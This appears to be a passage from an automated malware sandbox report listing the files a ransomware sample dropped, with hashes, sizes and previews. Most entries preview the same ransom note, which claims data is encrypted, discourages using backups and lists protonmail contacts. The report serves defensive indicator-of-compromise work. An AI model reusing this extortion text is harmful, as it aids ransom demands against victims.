                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\RoamingState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\Settings\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\Settings\settings.dat.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.66708882021724
                  Encrypted:false
                  SSDEEP:192:0YKc3LcZ49MGDMRuaVDdedjTSUdQZaRKRB6r0608i4LVW1uCB51rakCA/uZO5Of:JsZ4XARuaVdaLQZ0+ad0z4ofek90Ocf
                  MD5:54A847B1551CAD8B323B05235B75FA85
                  SHA1:A9687D7F0351191356B8573E48F2B680ECD51208
                  SHA-256:32CEF6A532A98B1D584BD8B0F5522FDB112B3A92A362B70BB5B698D677737B83
                  SHA-512:B03006D4046033E6660869C2C4BFFCFD40F5E8938E4F1B57E34ADB00087462D4E4B0DDC7E6C5D6FBFA23DC2A7C75B34B69D068889B569B5508869535FE8F3711
                  Malicious:false
                  Preview: p...).."...@F..e......x.=.....<..2...w._.>q....t.......e.....3T.H.p.t...#. .!.O.....BKu.....-\..$2..,/.}..t."HH..|j0....j.8....Q...."...?....L..T..zq..<53N&.Q.@A.g.i...jh..p4q....p.....QH..RB.8.+bT..9..s..].......3W....H......H..+Z.+Jm"%.k..".0.qY!z.W.4l..@h.....(CD.p..Rxj2..........^.r_2...'.c...L/..8M.Pq.8/.S.c.Q..&A...7*...........&;.Wu..x..5..w.>..o..2{...<. .?v.)....)(.:.G..V.g.s.D..6..B...{....#..SNi.B...LY=..2..l4.d.....L..u......`^+_..7.%6..aj..V.......OC6...i..],./6..QA..L)...../+vi.l.j!T.7.8C...N..../G.CF.=.m..E.i.F.\.\...#..r.f.(.......~...p...y....-..5...z....p..x...M."_p....*..c.T..tse.K.=.i..../D&.?.D.b..c1.O....K..oS.^....mT.]..fG.q.<..*Y.....3.R....g..$...K8\...J.@j.s<\#k$..g.Q.4.@..+=s'..1..].[....K.\..IJ.Z#....#..Y.UlC.m.....F.......+......+2..kw.....>.[.?..r..BEU.....=.S..yO.C...m..AZ.XDp..[2&.......bLd..;..eG.L..d........s.n.ki$....mD].r.l\.g.U.;!..E.M...JC..Xg>.yZ.D.O $4..C.8...ma`.....bV..x.....T.az.....!J..L.i]..
                  C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\SystemAppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\TempState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2665
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArJ:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw
                  MD5:E70B9F07BFC5AFD9FA1531063C76B4FF
                  SHA1:EDC8D069D1876965882BD95CC2873AA412518C94
                  SHA-256:447D333B1A111F8E2C5A4622B9F51DC0D480A3AAE33767A4C708DC85B0A97D2F
                  SHA-512:C47502FE22653B9B7C420303A8DD751ED3B286FA465FDDFFE729DAFF6236906C490917882EC9DA4561D87555DBA5B5026AB1D9DF6EB0C7350A82BA5CD33924A4
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\AC\INetCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\AC\INetCookies\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\AC\INetHistory\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\AC\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\AC\Temp\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\AppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\LocalCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\LocalState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\RoamingState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\Settings\Readme.README
